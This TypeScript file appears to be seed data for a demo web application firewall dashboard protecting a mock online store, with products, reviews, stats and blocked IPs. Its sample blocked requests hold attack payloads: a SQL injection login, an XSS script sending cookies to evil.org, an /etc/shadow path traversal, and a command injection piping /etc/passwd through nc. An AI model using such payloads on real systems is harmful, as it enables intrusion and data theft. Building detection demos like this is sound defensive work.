import {
  BlockedIPEntry,
  GatewayStats,
  Product,
  ProductReview,
  RecentVerdict,
} from './types';

export const INITIAL_PRODUCTS: Product[] = [
  {
    id: 1,
    name: 'Laptop Pro 15',
    description: 'High-performance laptop with 16GB RAM, 1TB NVMe SSD, and M3 Pro chipset.',
    price: 1299.99,
    category: 'electronics',
    stock: 100,
    rating: 4.9,
    image: '💻',
  },
  {
    id: 2,
    name: 'Wireless Ergonomic Mouse',
    description: 'Precision optical sensor with silent mechanical switches and Bluetooth 5.3.',
    price: 29.99,
    category: 'electronics',
    stock: 100,
    rating: 4.6,
    image: '🖱️',
  },
  {
    id: 3,
    name: 'USB-C HyperHub 7-in-1',
    description: '4K HDMI 60Hz, 100W Power Delivery, SD Card reader, dual USB-A 3.2.',
    price: 49.99,
    category: 'electronics',
    stock: 100,
    rating: 4.8,
    image: '🔌',
  },
  {
    id: 4,
    name: 'Mechanical RGB Keyboard',
    description: 'Hot-swappable custom tactile switches with aircraft-grade aluminum frame.',
    price: 89.99,
    category: 'electronics',
    stock: 100,
    rating: 4.9,
    image: '⌨️',
  },
  {
    id: 5,
    name: 'Heavyweight Classic T-Shirt',
    description: '100% combed organic cotton, pre-shrunk heavyweight fabric.',
    price: 24.99,
    category: 'clothing',
    stock: 100,
    rating: 4.7,
    image: '👕',
  },
  {
    id: 6,
    name: 'Vintage Wash Denim Jacket',
    description: 'Authentic 14oz selvedge denim jacket with custom brass hardware.',
    price: 79.99,
    category: 'clothing',
    stock: 100,
    rating: 4.5,
    image: '🧥',
  },
  {
    id: 7,
    name: 'Carbon Pro Running Shoes',
    description: 'Ultra-responsive carbon fiber plate with breathable kinetic mesh.',
    price: 119.99,
    category: 'clothing',
    stock: 100,
    rating: 4.8,
    image: '👟',
  },
  {
    id: 8,
    name: 'Python Crash Course (3rd Ed)',
    description: 'A hands-on, project-based introduction to modern programming.',
    price: 39.99,
    category: 'books',
    stock: 100,
    rating: 5.0,
    image: '📘',
  },
  {
    id: 9,
    name: 'Clean Code Architecture',
    description: 'A handbook of agile software craftsmanship and robust design patterns.',
    price: 34.99,
    category: 'books',
    stock: 100,
    rating: 4.9,
    image: '📕',
  },
  {
    id: 10,
    name: 'The Art of Cyber Strategy',
    description: 'Ancient tactical wisdom applied to modern threat modeling.',
    price: 12.99,
    category: 'books',
    stock: 100,
    rating: 4.7,
    image: '📗',
  },
  {
    id: 11,
    name: 'Precision Programmable Brewer',
    description: '12-cup thermal carafe with PID temperature control and bloom timer.',
    price: 69.99,
    category: 'home',
    stock: 100,
    rating: 4.4,
    image: '☕',
  },
  {
    id: 12,
    name: 'Minimalist LED Desk Lamp',
    description: 'Color temperature tunable 2700K-6500K with integrated 15W Qi charging pad.',
    price: 44.99,
    category: 'home',
    stock: 100,
    rating: 4.8,
    image: '💡',
  },
];

export const INITIAL_REVIEWS: ProductReview[] = [
  {
    id: 1,
    product_id: 1,
    user_id: 2,
    username: 'user1',
    rating: 5,
    comment: 'Amazing laptop, compiles models in seconds. Incredible display!',
    created_at: '2026-10-02 10:14:22',
  },
  {
    id: 2,
    product_id: 2,
    user_id: 2,
    username: 'user1',
    rating: 4,
    comment: 'Ergonomics are top notch, slightly smaller than anticipated.',
    created_at: '2026-10-02 11:32:05',
  },
  {
    id: 3,
    product_id: 5,
    user_id: 3,
    username: 'user2',
    rating: 5,
    comment: 'Fits true to size, material feels durable after multiple washes.',
    created_at: '2026-10-02 14:48:19',
  },
  {
    id: 4,
    product_id: 8,
    user_id: 3,
    username: 'user2',
    rating: 5,
    comment: 'Clear explanations and realistic exercises. Highly recommended.',
    created_at: '2026-10-03 09:12:44',
  },
];

export const INITIAL_VERDICTS: RecentVerdict[] = [
  {
    request_id: 'req_8f91c0e3a472',
    timestamp: new Date(Date.now() - 3000).toISOString(),
    client_ip: '198.51.100.42',
    method: 'POST',
    path: '/api/login',
    action: 'BLOCK',
    threat_type: 'SQLi',
    risk_level: 'CRITICAL',
    anomaly_score: 0.942,
    threat_confidence: 0.985,
    block_reason: 'ML_THREAT_DETECTED',
    ml_latency_ms: 3.8,
    total_latency_ms: 5.2,
    body: JSON.stringify({
      username: "admin' OR '1'='1' --",
      password: 'unknown_guess_pass',
    }),
    headers: {
      'content-type': 'application/json',
      'user-agent': 'python-requests/2.31.0',
      'x-forwarded-for': '198.51.100.42',
    },
    all_probabilities: {
      Normal: 0.002,
      SQLi: 0.985,
      XSS: 0.006,
      'Path Traversal': 0.003,
      'Command Injection': 0.004,
    },
    feature_importance: {
      num_sql_keywords: 4.25,
      num_special_chars: 3.12,
      uppercase_ratio: 0.78,
      payload_entropy: 0.65,
      url_length: 0.12,
    },
    attack_payload_highlight: "admin' OR '1'='1' --",
  },
  {
    request_id: 'req_1a72b83c9d11',
    timestamp: new Date(Date.now() - 9000).toISOString(),
    client_ip: '203.0.113.88',
    method: 'POST',
    path: '/api/products/1/reviews',
    action: 'BLOCK',
    threat_type: 'XSS',
    risk_level: 'HIGH',
    anomaly_score: 0.812,
    threat_confidence: 0.941,
    block_reason: 'ML_THREAT_DETECTED',
    ml_latency_ms: 4.1,
    total_latency_ms: 6.0,
    body: JSON.stringify({
      rating: 5,
      comment: "<script>fetch('http://evil.org/steal?c='+document.cookie)</script>Great gear!",
    }),
    headers: {
      'content-type': 'application/json',
      'user-agent': 'Mozilla/5.0 (Kali Linux; X11)',
      'x-forwarded-for': '203.0.113.88',
    },
    all_probabilities: {
      Normal: 0.015,
      SQLi: 0.012,
      XSS: 0.941,
      'Path Traversal': 0.018,
      'Command Injection': 0.014,
    },
    feature_importance: {
      num_xss_keywords: 5.1,
      num_special_chars: 4.3,
      payload_entropy: 1.2,
      body_length: 0.9,
      has_encoded_chars: 0.0,
    },
    attack_payload_highlight: "<script>fetch('http://evil.org/steal?c='+document.cookie)</script>",
  },
  {
    request_id: 'req_6c8419f07e2a',
    timestamp: new Date(Date.now() - 15000).toISOString(),
    client_ip: '192.168.1.105',
    method: 'GET',
    path: '/api/products',
    action: 'ALLOW',
    threat_type: 'Normal',
    risk_level: 'LOW',
    anomaly_score: 0.038,
    threat_confidence: 0.997,
    block_reason: null,
    ml_latency_ms: 2.9,
    total_latency_ms: 8.4,
    body: '',
    headers: {
      accept: 'application/json',
      'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0',
    },
    all_probabilities: {
      Normal: 0.997,
      SQLi: 0.001,
      XSS: 0.001,
      'Path Traversal': 0.0,
      'Command Injection': 0.001,
    },
    feature_importance: {
      url_length: 0.02,
      num_parameters: 0.0,
      payload_entropy: 0.01,
      num_special_chars: 0.0,
      request_method: 0.01,
    },
  },
  {
    request_id: 'req_5b338e124fa0',
    timestamp: new Date(Date.now() - 22000).toISOString(),
    client_ip: '185.220.101.5',
    method: 'GET',
    path: '/api/download?file=../../../../etc/shadow',
    action: 'BLOCK',
    threat_type: 'Path Traversal',
    risk_level: 'CRITICAL',
    anomaly_score: 0.915,
    threat_confidence: 0.978,
    block_reason: 'ML_THREAT_DETECTED',
    ml_latency_ms: 3.4,
    total_latency_ms: 4.9,
    body: '',
    headers: {
      'user-agent': 'curl/8.4.0',
      'x-forwarded-for': '185.220.101.5',
    },
    all_probabilities: {
      Normal: 0.004,
      SQLi: 0.006,
      XSS: 0.005,
      'Path Traversal': 0.978,
      'Command Injection': 0.007,
    },
    feature_importance: {
      num_path_traversal_patterns: 5.6,
      num_slashes: 4.8,
      num_dots: 4.2,
      url_length: 1.1,
      num_special_chars: 0.9,
    },
    attack_payload_highlight: '../../../../etc/shadow',
  },
  {
    request_id: 'req_77d201ab5ef8',
    timestamp: new Date(Date.now() - 32000).toISOString(),
    client_ip: '45.142.214.19',
    method: 'POST',
    path: '/api/ping',
    action: 'BLOCK',
    threat_type: 'Command Injection',
    risk_level: 'CRITICAL',
    anomaly_score: 0.958,
    threat_confidence: 0.989,
    block_reason: 'ML_THREAT_DETECTED',
    ml_latency_ms: 3.9,
    total_latency_ms: 5.4,
    body: JSON.stringify({
      host: '127.0.0.1; cat /etc/passwd | nc 198.51.100.99 4444',
    }),
    headers: {
      'content-type': 'application/json',
      'user-agent': 'Go-http-client/1.1',
    },
    all_probabilities: {
      Normal: 0.002,
      SQLi: 0.003,
      XSS: 0.002,
      'Path Traversal': 0.004,
      'Command Injection': 0.989,
    },
    feature_importance: {
      num_command_injection_patterns: 6.2,
      num_special_chars: 3.8,
      payload_entropy: 1.9,
      body_length: 1.2,
      has_encoded_chars: 0.0,
    },
    attack_payload_highlight: '; cat /etc/passwd | nc',
  },
  {
    request_id: 'req_39fe109cbb21',
    timestamp: new Date(Date.now() - 41000).toISOString(),
    client_ip: '104.244.42.1',
    method: 'POST',
    path: '/api/login',
    action: 'RATE_LIMIT',
    threat_type: 'Credential Stuffing',
    risk_level: 'HIGH',
    anomaly_score: 0.74,
    threat_confidence: 0.86,
    block_reason: 'RATE_LIMIT_EXCEEDED',
    ml_latency_ms: 2.1,
    total_latency_ms: 3.1,
    body: JSON.stringify({ username: 'ceo@store.com', password: 'Password123!' }),
    headers: {
      'content-type': 'application/json',
      'x-rate-limit-exceeded': '38 req/sec',
    },
    attack_payload_highlight: 'Rate limit trigger: 38 attempts / 2s',
  },
  {
    request_id: 'req_881a4b9c1d02',
    timestamp: new Date(Date.now() - 53000).toISOString(),
    client_ip: '192.168.1.108',
    method: 'GET',
    path: '/api/search?q=mechanical+keyboard',
    action: 'ALLOW',
    threat_type: 'Normal',
    risk_level: 'LOW',
    anomaly_score: 0.045,
    threat_confidence: 0.995,
    block_reason: null,
    ml_latency_ms: 2.8,
    total_latency_ms: 7.9,
    body: '',
    headers: {
      accept: 'application/json',
      'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)',
    },
  },
  {
    request_id: 'req_992c3d4e5f60',
    timestamp: new Date(Date.now() - 65000).toISOString(),
    client_ip: '192.168.1.112',
    method: 'GET',
    path: '/api/products/4',
    action: 'ALLOW',
    threat_type: 'Normal',
    risk_level: 'LOW',
    anomaly_score: 0.032,
    threat_confidence: 0.998,
    block_reason: null,
    ml_latency_ms: 2.4,
    total_latency_ms: 6.8,
    body: '',
    headers: {
      accept: 'application/json',
    },
  },
];

export const INITIAL_STATS: GatewayStats = {
  total_requests: 14829,
  allowed_requests: 13912,
  blocked_requests: 843,
  rate_limited_requests: 74,
  flagged_requests: 11,
  avg_ml_latency_ms: 3.65,
  active_blocked_ips: 14,
  uptime_seconds: 86420,
  requests_per_second: 42.8,
};

export const INITIAL_BLOCKED_IPS: BlockedIPEntry[] = [
  {
    ip: '198.51.100.42',
    reason: 'ML_CRITICAL:SQLi',
    blocked_at: new Date(Date.now() - 1000 * 120).toISOString(),
    ttl_remaining_seconds: 3480,
    severity: 'CRITICAL',
  },
  {
    ip: '203.0.113.88',
    reason: 'ML_CRITICAL:XSS',
    blocked_at: new Date(Date.now() - 1000 * 340).toISOString(),
    ttl_remaining_seconds: 3260,
    severity: 'HIGH',
  },
  {
    ip: '185.220.101.5',
    reason: 'ML_CRITICAL:Path Traversal',
    blocked_at: new Date(Date.now() - 1000 * 680).toISOString(),
    ttl_remaining_seconds: 2920,
    severity: 'CRITICAL',
  },
  {
    ip: '45.142.214.19',
    reason: 'ML_CRITICAL:Command Injection',
    blocked_at: new Date(Date.now() - 1000 * 1150).toISOString(),
    ttl_remaining_seconds: 2450,
    severity: 'CRITICAL',
  },
  {
    ip: '104.244.42.1',
    reason: 'excessive_rate_limit_violations',
    blocked_at: new Date(Date.now() - 1000 * 1800).toISOString(),
    ttl_remaining_seconds: 1800,
    severity: 'HIGH',
  },
  {
    ip: '91.240.118.172',
    reason: 'automated_scanner_detection',
    blocked_at: new Date(Date.now() - 1000 * 2200).toISOString(),
    ttl_remaining_seconds: 1400,
    severity: 'MEDIUM',
  },
];
